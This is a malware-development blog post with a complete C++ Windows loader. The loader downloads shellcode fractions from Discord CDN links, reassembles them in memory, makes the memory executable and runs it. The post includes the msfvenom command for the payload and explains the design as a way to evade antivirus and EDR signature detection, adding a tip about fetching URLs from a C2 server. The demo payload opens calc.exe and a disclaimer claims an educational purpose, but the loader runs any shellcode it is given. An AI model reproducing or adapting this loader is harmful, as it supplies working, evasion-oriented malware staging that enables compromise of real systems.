From URL to Execution: Assembling a Payload Entirely In-Memory

If you’re new to malware development (maldev), the sheer complexity can be overwhelming. How do you even begin to understand something as advanced as in-memory execution?

The answer is simple: you break it down.

This post is the culmination of my first major milestone: combining five core sub-projects into a single, functional loader that downloads a payload from a server, reassembles it directly in memory, and executes it—all without ever touching the disk.

I didn’t start here, though. I began by deconstructing the problem into the smallest possible parts. If you’re just starting out, I highly recommend you follow the same path. On my GitHub repository, I’ve structured these steps as Project 1, Sub-projects 1.1 to 1.5. They cover the absolute fundamentals:

1.1: Basic Memory Allocation (VirtualAlloc)
1.2: Downloading to Memory via WinHTTP
1.3: Parsing Headers In-Memory
1.4: Allocating Executable Memory
1.5: Handling Multiple Fractions

Master these first. Once you understand them, the combined code in this post will make perfect sense. This method of learning—dividing a complex problem into solvable chunks—is the most effective way to build deep, lasting knowledge.

Why a Fractionated Loader?

The core idea behind splitting a payload into fractions is evasion. By itself, a full payload might have a signature that antivirus (AV) or endpoint detection (EDR) software can easily spot. But broken into pieces and hosted on a seemingly legitimate server (like a Discord CDN), each fraction is just inert data.

It’s only when we download and reassemble those fractions in memory that the payload becomes executable. This allows us to bypass static, signature-based detection.

However, a note of caution: This technique is not a silver bullet. Modern EDRs are sophisticated. They use behavioral analysis and API hooking to monitor for exactly this kind of activity—a program allocating executable memory and writing to it. This loader is a foundational step, not a final product. It gets us past the first line of defense but sets the stage for the next challenges: bypassing hooks and evading behavioral detection.

My Development Environment

Before we get into the nitty-gritty of the code, let’s talk about the setup I used to build and test this loader. Malware development often requires a mix of Linux and Windows environments, especially when targeting Windows systems (which is the case here, given the WinAPI calls we’ll be using). Here’s a breakdown of my toolkit:

Operating System: I’m running Kali Linux as my primary OS. It’s a fantastic choice for security research and development because it comes pre-loaded with a ton of tools for penetration testing, reverse engineering, and payload generation. Plus, its Debian base makes it stable and customizable.
Virtualization: For testing on Windows, I use KVM (Kernel-based Virtual Machine) to spin up isolated Windows VMs. This keeps my host machine clean and allows me to snapshot states before and after execution for easy rollback. I typically run Windows 10 or 11 guests, depending on the target environment.
Code Editor: Visual Studio Code (VS Code) is my go-to for writing and editing C++ code. It’s lightweight, extensible with plugins for C++ IntelliSense, debugging, and even Git integration, which makes managing my repo a breeze.
Compilation: Since this loader targets Windows, I cross-compile from Kali using the MinGW-w64 toolchain—specifically, x86_64-w64-mingw32-g++. This lets me build 64-bit Windows executables directly on Linux without needing to boot into a Windows machine every time.
Payload Generation: For creating the sample payload, I used msfvenom from Metasploit. It’s straightforward for generating shellcode or executables. In this case, I kept it simple: a payload that just launches calc.exe (the Windows calculator). Nothing fancy—just enough to demonstrate execution without risking real harm during testing. Here’s the command I used for reference: msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o payload.bin. I then fractionated this binary for the loader.
Debugging Output: To monitor the loader’s behavior without cluttering the console or risking detection artifacts, I use DebugView (from Sysinternals). This tool captures debug output from Windows applications in real-time, which is perfect for seeing what’s happening under the hood.

Why DebugView Over Console Output with printf?

You might wonder why I’m not just using standard console output like printf or std::cout for debugging. That’s a fair question, especially if you’re coming from general software development. In maldev, stealth and minimal footprints are key. Here’s why DebugView is superior in this context:

Stealth and Evasion: Printing to the console (e.g., via printf) produces output that anyone looking at the screen can see, and it only works when the process has a console attached. Debug output, on the other hand, uses OutputDebugString (a WinAPI function), which hands the message to an attached debugger or a listener such as DebugView and displays nothing on-screen otherwise. This keeps the loader “quiet” during execution, though the strings are readable by anyone who does run such a listener.
Non-Invasive Monitoring: DebugView runs separately and captures output from any process using debug strings. You can filter by process ID, highlight keywords, or save logs—all without modifying the code or attaching a full debugger like WinDbg, which could interfere with EDR hooks.
Better for In-Memory Operations: Since our loader is all about avoiding disk writes, it is worth noting that console output can end up on disk if it is redirected or logged by whatever launched the process. Debug strings are held in memory and are gone unless a listener captures them.
Portability in Testing: In a VM setup, I can run DebugView on the guest OS and monitor from my Kali host if needed (via shared folders or remote tools). It’s also great for catching errors in release builds where console output might be stripped.

In short, while printf is fine for quick scripts, DebugView aligns better with maldev principles: observe without being observed. If you’re following along, grab it from the Microsoft Sysinternals suite—it’s free and essential for Windows debugging.

Now, with the setup out of the way, let’s dive into the code and see how it all comes together.

Code Sections

#include <windows.h>
#include <winhttp.h>
#pragma comment(lib, "winhttp.lib")

void debugprint(LPCWSTR format, ...) {
    WCHAR buffer[1024];
    va_list arg;
    va_start(arg, format);
    wvsprintfW(buffer, format, arg);
    va_end(arg);
    OutputDebugStringW(buffer);
}

int find_ordinal(BYTE* pHeader) {
    CHAR ordinal_char = (char)pHeader[11];
    int ordinal = ordinal_char - '0';
    return ordinal;
}

int main() {
    WCHAR urls[10][512] = { //here you have to add links eg: L"https://first_fraction.vx"
        
    };

    HINTERNET session = WinHttpOpen(
        L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY,
        WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS,
        0
    );
    
    if (!session) {
        debugprint(L"session is failed error: %lu\n", GetLastError());
        return 1;
    }

    // Store each payload with its ordinal
    struct PayloadChunk {
        int ordinal;
        BYTE* data;
        SIZE_T size;
    };
    
    PayloadChunk chunks[10] = {0};
    int chunk_count = 0;
    SIZE_T total_final_size = 0;

    for (int i = 0; i < 10; i++) {
        const wchar_t* url = urls[i];
        debugprint(L"urls %ls\n", url);

        URL_COMPONENTS urlcomp = {0};
        urlcomp.dwStructSize = sizeof(urlcomp);
        WCHAR hostname[256] = {0};
        urlcomp.lpszHostName = hostname;
        urlcomp.dwHostNameLength = sizeof(hostname) / sizeof(WCHAR);

        if (!WinHttpCrackUrl(url, wcslen(url), 0, &urlcomp)) {
            debugprint(L"unable to crack the url %lu\n", GetLastError());
            continue;
        }

        HINTERNET connect = WinHttpConnect(session, hostname, urlcomp.nPort, 0);
        if (!connect) {
            debugprint(L"connect is failed error: %lu\n", GetLastError());
            continue;
        }

        HINTERNET open_request = WinHttpOpenRequest(
            connect,
            L"GET",
            urls[i] + wcslen(L"https://cdn.discordapp.com"),
            NULL,
            WINHTTP_NO_REFERER,
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            WINHTTP_FLAG_SECURE
        );

        if (!open_request) {
            debugprint(L"failed to open request error: %lu\n", GetLastError());
            WinHttpCloseHandle(connect);
            continue;
        }

        BOOL send_request = WinHttpSendRequest(
            open_request,
            WINHTTP_NO_ADDITIONAL_HEADERS,
            0,
            WINHTTP_NO_REQUEST_DATA,
            0,
            0,
            0
        );

        if (!send_request) {
            debugprint(L"failed to send request error: %lu\n", GetLastError());
            WinHttpCloseHandle(open_request);
            WinHttpCloseHandle(connect);
            continue;
        }

        BOOL receive_response = WinHttpReceiveResponse(open_request, NULL);
        if (!receive_response) {
            debugprint(L"could not receive the response %lu\n", GetLastError());
            WinHttpCloseHandle(open_request);
            WinHttpCloseHandle(connect);
            continue;
        }

        DWORD dwsize = 0;
        BYTE* pDownload = NULL;
        SIZE_T total_size = 0;
        SIZE_T buffer_size = 4096;
        
        pDownload = (BYTE*)VirtualAlloc(NULL, buffer_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (!pDownload) {
            debugprint(L"failed to allocate pDownload error: %lu\n", GetLastError());
            WinHttpCloseHandle(open_request);
            WinHttpCloseHandle(connect);
            continue;
        }

        do {
            dwsize = 0;
            if (!WinHttpQueryDataAvailable(open_request, &dwsize)) {
                debugprint(L"failed WinHttpQueryDataAvailable error: %lu\n", GetLastError());
                break;
            }

            if (dwsize == 0) break;

            if (dwsize + total_size > buffer_size) {
                SIZE_T new_buffer_size = buffer_size;
                while (dwsize + total_size > new_buffer_size) {
                    new_buffer_size *= 2;
                }

                BYTE* pNew_download = (BYTE*)VirtualAlloc(NULL, new_buffer_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
                if (!pNew_download) {
                    debugprint(L"unable to allocate memory for new_download error: %lu\n", GetLastError());
                    break;
                }

                CopyMemory(pNew_download, pDownload, total_size);
                VirtualFree(pDownload, 0, MEM_RELEASE);
                pDownload = pNew_download;
                buffer_size = new_buffer_size;
            }

            DWORD dw_download = 0;
            if (!WinHttpReadData(open_request, pDownload + total_size, dwsize, &dw_download)) {
                debugprint(L"failed to read the bytes error: %lu\n", GetLastError());
                break;
            }

            total_size += dw_download;
        } while (dwsize > 0);

        debugprint(L"total downloaded size %d\n", total_size);

        if (total_size >= 32) {
            // Extract ordinal from header
            int ordinal = find_ordinal(pDownload);
            debugprint(L"ordinal %d\n", ordinal);

            // Extract payload (everything after 32 bytes)
            SIZE_T payload_size = total_size - 32;
            BYTE* payload_data = pDownload + 32;

            debugprint(L"payload size %d\n", payload_size);

            // Store this chunk
            if (chunk_count < 10) {
                chunks[chunk_count].ordinal = ordinal;
                chunks[chunk_count].size = payload_size;
                
                // Allocate memory and copy payload
                chunks[chunk_count].data = (BYTE*)VirtualAlloc(NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
                if (chunks[chunk_count].data) {
                    CopyMemory(chunks[chunk_count].data, payload_data, payload_size);
                    total_final_size += payload_size;
                    chunk_count++;
                }
            }
        }

        VirtualFree(pDownload, 0, MEM_RELEASE);
        WinHttpCloseHandle(open_request);
        WinHttpCloseHandle(connect);
    }

    // Now assemble the final payload in correct order
    BYTE* final_payload = NULL;
    SIZE_T current_offset = 0;
    DWORD old_protect = 0;
    
    if (total_final_size > 0) {
        final_payload = (BYTE*)VirtualAlloc(NULL, total_final_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (final_payload) {
            current_offset = 0;
            
            // Copy chunks in ordinal order (0, 1, 2, 3, ...)
            for (int ord = 0; ord < 10; ord++) {
                for (int i = 0; i < chunk_count; i++) {
                    if (chunks[i].ordinal == ord) {
                        CopyMemory(final_payload + current_offset, chunks[i].data, chunks[i].size);
                        current_offset += chunks[i].size;
                        debugprint(L"Added chunk ordinal %d, size %d at offset %d\n", ord, chunks[i].size, current_offset - chunks[i].size);
                        break;
                    }
                }
            }

            debugprint(L"Final assembled payload size: %d bytes\n", current_offset);

            // Change memory protection to executable
            if (!VirtualProtect(final_payload, current_offset, PAGE_EXECUTE_READ, &old_protect)) {
                debugprint(L"[-] VirtualProtect failed! Error: %lu\n", GetLastError());
                VirtualFree(final_payload, 0, MEM_RELEASE);
                final_payload = NULL;
            } else {
                // Execute the shellcode
                typedef void (*ShellcodeFunc)();
                ShellcodeFunc func = (ShellcodeFunc)final_payload;
                func();
                
                VirtualFree(final_payload, 0, MEM_RELEASE);
            }
        }
    }

    // Cleanup chunk memory
    for (int i = 0; i < chunk_count; i++) {
        if (chunks[i].data) {
            VirtualFree(chunks[i].data, 0, MEM_RELEASE);
        }
    }

    WinHttpCloseHandle(session);
    return 0;
}

Proof of Concept

Explaining the Code: Building the Fractionated Loader

Now that we’ve covered the why and the setup, let’s walk through the code for our in-memory loader. My goal was to create a program that downloads payload fractions from a server, reassembles them in memory, and executes the payload—all without touching the disk. This ties back to the sub-projects I outlined earlier (1.1–1.5), which taught me the fundamentals of memory allocation, downloading data, parsing headers, and handling fractions.

I’ll break down the code into its core components, explaining my approach, the challenges I faced, and how each piece contributes to the final loader. If you’re following along, I recommend checking out the full code on my GitHub repo and experimenting with the sub-projects first. Let’s dive in!

1. Debugging with debugprint

void debugprint(LPCWSTR format, ...) {
    WCHAR buffer[1024];
    va_list arg;
    va_start(arg, format);
    wvsprintfW(buffer, format, arg);
    va_end(arg);
    OutputDebugStringW(buffer);
}

To monitor the loader’s behavior without leaving artifacts, I used OutputDebugStringW for logging, which DebugView captures in real-time. This aligns with Sub-project 1.3 (parsing headers in-memory) and my goal of staying stealthy.

What It Does: The debugprint function is a wrapper for OutputDebugStringW, which sends wide-character strings to DebugView. It uses variable arguments (va_list) to format messages, similar to printf, but outputs to the debug stream instead of the console.

Why It Matters: Console output (e.g., printf) is visible to anyone watching the machine. DebugView lets me monitor progress (e.g., errors or download status) without writing a log file or opening a window. I used wvsprintfW for formatting wide strings, though it’s not the most secure option because it takes no buffer-size argument. For learning, you could swap it for a bounded alternative; since debugprint already holds a va_list, that would be _vsnwprintf or StringCchVPrintfW rather than _snwprintf. wvsprintfW works for now since we’re focusing on functionality.

Challenge: Early on, I forgot to use wide-character strings (LPCWSTR) for WinAPI compatibility, which caused garbled output. Using wide strings and OutputDebugStringW fixed this.

Usage Example: debugprint(L"Failed to allocate memory: %lu\n", GetLastError());
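
As a portable illustration of the bounded-formatting idea, here is a minimal sketch built on the standard vswprintf, which takes the buffer capacity as an argument. The name format_message and the fallback text are hypothetical and not part of the loader. The sketch stops at producing the string; on Windows the result could then be handed to OutputDebugStringW.

```cpp
#include <cassert>
#include <cstdarg>
#include <cstddef>
#include <cwchar>
#include <string>

// Hypothetical helper: formats into a fixed buffer and never writes past it.
std::wstring format_message(const wchar_t* format, ...) {
    assert(format != nullptr);
    wchar_t buffer[1024];
    va_list args;
    va_start(args, format);
    // vswprintf receives the capacity in wide characters and returns a
    // negative value when the formatted text does not fit or is malformed.
    int written = std::vswprintf(buffer, sizeof(buffer) / sizeof(buffer[0]), format, args);
    va_end(args);
    if (written < 0) {
        return L"[message truncated or malformed]";
    }
    return std::wstring(buffer, static_cast<std::size_t>(written));
}
```

The design choice here is to report an oversized message explicitly instead of silently cutting it off, which tends to make a missing log line easier to diagnose.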

2. Extracting the Ordinal with find_ordinal

Each payload fraction has a header (added by my breaker tool, available on GitHub) that includes an ordinal to indicate its order. This ties to Sub-project 1.5 (handling multiple fractions).

int find_ordinal(BYTE* pHeader) {
    CHAR ordinal_char = (char)pHeader[11];
    int ordinal = ordinal_char - '0';
    return ordinal;
}

What It Does: This function reads the byte at offset 11 of the downloaded fraction’s header (the twelfth byte, since indexing starts at zero), which contains the ordinal (e.g., '0' for the first fraction). It converts this ASCII character to an integer by subtracting '0' (ASCII 48).

Why It Matters: The ordinal tells us where this fraction fits in the final payload. Without it, we’d have a jumbled mess. My breaker tool embeds the ordinal at offset 11, so we extract it here.

Challenge: This approach assumes single-digit ordinals (0–9), and it does not check that the byte is actually a digit. For more than 10 fractions (ordinals such as 11 or 15), I’d need to parse a multi-digit number, for example with atoi. For this demo with 10 fractions, the simple subtraction works fine.
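
To make the multi-digit case concrete, here is a minimal sketch of a bounds-checked parser. It assumes the digits sit back to back starting at the given offset and end at the first non-digit byte; that layout, the name parse_ordinal, and the max_digits parameter are assumptions for illustration, and the breaker tool's real header format may differ.

```cpp
#include <cassert>
#include <cstddef>

// Hypothetical layout: decimal digits start at `offset` and end at the first
// non-digit byte. Returns -1 when no digit is found at `offset`.
int parse_ordinal(const unsigned char* header, std::size_t header_len,
                  std::size_t offset, std::size_t max_digits) {
    assert(header != nullptr);
    int value = 0;
    std::size_t digits = 0;
    // Stop at the end of the header, at the digit limit, or at a non-digit.
    while (offset + digits < header_len && digits < max_digits) {
        unsigned char c = header[offset + digits];
        if (c < '0' || c > '9') break;
        value = value * 10 + (c - '0');
        ++digits;
    }
    return digits == 0 ? -1 : value;
}
```

Unlike the plain subtraction, this version never reads past the header and reports a malformed header instead of returning a meaningless number. Capping max_digits at a small value also keeps the int from overflowing.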

3. Main Function: Setting Up the Loader

The main function orchestrates everything: downloading fractions, parsing them, reassembling the payload, and executing it. Let’s break it down step-by-step.

3.1. Defining URLs

I start by defining an array of URLs hosting the payload fractions (created with msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o payload.bin and split using my breaker tool). These are hosted on a Discord CDN for this demo.

WCHAR urls[10][512] = {
    L"https://cdn.discordapp.com/attachments/.../Fraction0.vx?...",
    // ... (9 more URLs)
};

Why 512?: Discord’s query parameters make each URL long, and 512 wide characters per entry leaves enough room for them. If you use a different server with shorter URLs, you could reduce this size.

Tip: Hardcoding URLs is fine for a proof-of-concept, but in a real scenario, you’d want a dynamic list (e.g., fetched from a C2 server) to avoid static detection.

3.2. Initializing WinHTTP

To download the fractions in-memory (Sub-project 1.2), I use the WinHTTP API, which is native to Windows and supports HTTPS.

HINTERNET session = WinHttpOpen(
    L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY,
    WINHTTP_NO_PROXY_NAME,
    WINHTTP_NO_PROXY_BYPASS,
    0
);
if (!session) {
    debugprint(L"Session failed: %lu\n", GetLastError());
    return 1;
}

What It Does: WinHttpOpen creates a session handle, which is the foundation for all HTTP operations. I used a browser-like user agent to blend in with normal traffic.

Mistake I Made: Initially, I put WinHttpOpen inside the URL loop, creating multiple sessions unnecessarily. It’s more efficient to create one session and reuse it for all downloads.

Why It Matters: This sets up a secure, in-memory download pipeline. If the session fails, we log the error with debugprint and exit.

3.3. Storing Payload Chunks

To keep track of fractions, I created a PayloadChunk struct.

struct PayloadChunk {
    int ordinal;
    BYTE* data;
    SIZE_T size;
};
PayloadChunk chunks[10] = {0};
int chunk_count = 0;
SIZE_T total_final_size = 0;

Why This Approach?: Each fraction has an ordinal, data, and size. Storing them in a struct lets me reassemble them in the correct order later. I tried using offsets initially, but that required fixed-size fractions, which isn’t flexible. The struct approach scales better since it doesn’t assume uniform sizes.

3.4. Downloading and Processing Fractions

This is the heart of the loader: a loop that downloads each fraction, extracts its ordinal, and stores it. Here’s the key flow:

Crack the URL: I use WinHttpCrackUrl to extract the hostname and port. I struggled with getting the correct object filename, so for simplicity I hardcoded the path offset (wcslen(L"https://cdn.discordapp.com")), which means the request path is only correct for URLs that start with exactly that prefix. In production, you’d want a more robust parsing method.
Connect and Request: Using WinHttpConnect, WinHttpOpenRequest, WinHttpSendRequest, and WinHttpReceiveResponse, I establish a connection and fetch the fraction.
Dynamic Memory Allocation: Each fraction is downloaded into a buffer allocated with VirtualAlloc (Sub-project 1.1). If the data exceeds the buffer size, I dynamically resize it.

if (dwsize + total_size > buffer_size) {
    SIZE_T new_buffer_size = buffer_size;
    while (dwsize + total_size > new_buffer_size) {
        new_buffer_size *= 2;
    }
    BYTE* pNew_download = (BYTE*)VirtualAlloc(NULL, new_buffer_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!pNew_download) {
        debugprint(L"Unable to allocate memory: %lu\n", GetLastError());
        break;
    }
    CopyMemory(pNew_download, pDownload, total_size);
    VirtualFree(pDownload, 0, MEM_RELEASE);
    pDownload = pNew_download;
    buffer_size = new_buffer_size;
}

What It Does: If the number of bytes waiting to be read (dwsize) plus the bytes already stored (total_size) exceeds the buffer size, I double the buffer size until it’s large enough, allocate a new buffer, copy the existing data, and free the old buffer.

Why Dynamic?: Fractions vary in size, and WinHttpQueryDataAvailable only tells us how much data is available at a time. This ensures we don’t run out of space mid-download.
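
The doubling rule on its own can be written as a small pure function, which makes it easy to check in isolation. This is a sketch only: the name grown_capacity and the overflow fallback are my additions and do not appear in the loader.

```cpp
#include <cassert>
#include <cstddef>
#include <limits>

// Doubles `current` until it can hold `required` bytes.
std::size_t grown_capacity(std::size_t current, std::size_t required) {
    assert(current > 0);  // doubling zero would never terminate
    std::size_t capacity = current;
    while (capacity < required) {
        if (capacity > std::numeric_limits<std::size_t>::max() / 2) {
            return required;  // doubling would overflow, so fall back to the exact size
        }
        capacity *= 2;
    }
    return capacity;
}
```

With a 4096-byte starting buffer, a request for 4097 bytes gives 8192 and a request for 20000 bytes gives 32768. Doubling keeps the number of reallocations logarithmic in the final size, at the cost of some unused space.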

Extract and Store: After downloading, I call find_ordinal to get the fraction’s order, skip the 32-byte header, and store the payload data in a PayloadChunk.

if (total_size >= 32) {
    int ordinal = find_ordinal(pDownload);
    SIZE_T payload_size = total_size - 32;
    BYTE* payload_data = pDownload + 32;
    chunks[chunk_count].ordinal = ordinal;
    chunks[chunk_count].size = payload_size;
    chunks[chunk_count].data = (BYTE*)VirtualAlloc(NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    CopyMemory(chunks[chunk_count].data, payload_data, payload_size);
    total_final_size += payload_size;
    chunk_count++;
}

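Challenge: Early on, I forgot to check if total_size >= 32, which caused crashes when downloading incomplete fractions. SIZE_T is unsigned, so for a response shorter than the header, total_size - 32 wraps around to an enormous value instead of going negative. Adding this check ensured robustness. (The excerpt above is trimmed; the full listing also checks chunk_count < 10 and the result of VirtualAlloc before copying.)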
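
The length check can be folded into one helper so that the subtraction never runs on a short buffer. This is a minimal, platform-independent sketch; PayloadView, strip_header, and kHeaderSize are hypothetical names, with 32 taken from the header size used in this post.

```cpp
#include <cassert>
#include <cstddef>

constexpr std::size_t kHeaderSize = 32;  // header length used in this post

struct PayloadView {
    const unsigned char* data;  // first byte after the header, or nullptr
    std::size_t size;           // number of bytes after the header
};

// Returns {nullptr, 0} when the buffer is too short to contain a full header.
PayloadView strip_header(const unsigned char* buffer, std::size_t total_size) {
    assert(buffer != nullptr);
    if (total_size < kHeaderSize) {
        return {nullptr, 0};
    }
    // Safe: total_size >= kHeaderSize, so the subtraction cannot wrap.
    return {buffer + kHeaderSize, total_size - kHeaderSize};
}
```

A caller then has a single result to test (data against nullptr) rather than having to remember the size comparison at every use.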

3.5. Reassembling and Executing the Payload

Once all fractions are downloaded, I reassemble them in ordinal order.

BYTE* final_payload = (BYTE*)VirtualAlloc(NULL, total_final_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (final_payload) {
    SIZE_T current_offset = 0;
    for (int ord = 0; ord < 10; ord++) {
        for (int i = 0; i < chunk_count; i++) {
            if (chunks[i].ordinal == ord) {
                CopyMemory(final_payload + current_offset, chunks[i].data, chunks[i].size);
                current_offset += chunks[i].size;
                debugprint(L"Added chunk %d, size %d at offset %d\n", ord, chunks[i].size, current_offset - chunks[i].size);
                break;
            }
        }
    }
}

What It Does: I allocate a final buffer for the reassembled payload, then copy each chunk’s data in order (0, 1, 2, …, 9). The current_offset tracks where to place each chunk.
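
The same ordering step can be expressed with standard containers. The sketch below sorts the chunks by ordinal and concatenates them, and it additionally rejects sequences with a gap or a duplicate, which the nested loop above does not do. Chunk and reassemble are illustrative names, and this is an alternative formulation rather than the code the loader uses.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <vector>

struct Chunk {
    int ordinal;
    std::vector<unsigned char> data;
};

// Returns true and fills `out` only when ordinals 0..n-1 each appear exactly once.
bool reassemble(std::vector<Chunk> chunks, std::vector<unsigned char>& out) {
    std::sort(chunks.begin(), chunks.end(),
              [](const Chunk& a, const Chunk& b) { return a.ordinal < b.ordinal; });
    std::size_t total = 0;
    for (const Chunk& c : chunks) total += c.data.size();
    out.clear();
    out.reserve(total);
    for (std::size_t i = 0; i < chunks.size(); ++i) {
        if (chunks[i].ordinal != static_cast<int>(i)) {
            out.clear();
            return false;  // gap or duplicate in the sequence
        }
        out.insert(out.end(), chunks[i].data.begin(), chunks[i].data.end());
    }
    assert(out.size() == total);  // every chunk was copied exactly once
    return true;
}
```

Chunks with ordinals 2, 0, 1 come out in the order 0, 1, 2, while a set containing only ordinals 0 and 2 is rejected because ordinal 1 is missing.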

Execution: To execute the payload (a calc.exe shellcode in this case), I change the memory protection to executable (Sub-project 1.4) and call it as a function.

if (VirtualProtect(final_payload, current_offset, PAGE_EXECUTE_READ, &old_protect)) {
    typedef void (*ShellcodeFunc)();
    ShellcodeFunc func = (ShellcodeFunc)final_payload;
    func();
}

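Why It Matters: Changing to PAGE_EXECUTE_READ allows execution while minimizing permissions: the buffer is writable while it is being filled and read-execute afterwards, so it is never writable and executable at the same time. The shellcode runs calc.exe, proving the loader works.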

Challenge: EDRs often hook VirtualProtect, so this step could trigger detection. For now, it’s a proof-of-concept, but future posts will explore bypassing these hooks.

3.6. Cleanup

Finally, I free all allocated memory and close WinHTTP handles to avoid leaks.

for (int i = 0; i < chunk_count; i++) {
    if (chunks[i].data) VirtualFree(chunks[i].data, 0, MEM_RELEASE);
}
WinHttpCloseHandle(session);

Why It Matters: Proper cleanup ensures no memory leaks, which is critical for stealth and stability.

Lessons Learned

Modularity: Breaking the problem into sub-projects (1.1–1.5) made it manageable. Each sub-project built a skill I needed for the final loader.
Error Handling: Checking every WinAPI call (e.g., WinHttpOpen, VirtualAlloc) and logging errors with debugprint saved me hours of debugging.
Flexibility: The PayloadChunk struct made reassembly robust, avoiding the pitfalls of hardcoded offsets or fixed sizes.
Stealth: Using DebugView and in-memory operations minimized my footprint, but I’m aware EDRs could still detect this. That’s the next challenge!

Disclaimer

This project is intended solely for educational and research purposes to understand malware development techniques in a controlled, ethical environment. The code and concepts discussed here should not be used to harm systems, networks, or individuals. Malware development is a sensitive topic, and I strongly encourage responsible use of this knowledge, such as in security research or red teaming with explicit permission. Always comply with applicable laws and ethical guidelines. I am not responsible for any misuse of the information or code provided.

Try It Yourself

The full code is above, but I encourage you to clone my GitHub repo and start with the sub-projects (1.1–1.5). Experiment with your own msfvenom payloads or different servers to see how it works. If you hit issues, check DebugView logs or drop a comment. I’d love to hear your feedback!

Connect With Me

I’m always excited to connect with fellow security enthusiasts, developers, and learners! Follow me on X at rootfu_ for quick updates on my projects, or connect with me on LinkedIn to dive deeper into malware development, security research, or just chat about tech. Let me know what you’re working on; I’d love to learn from you too!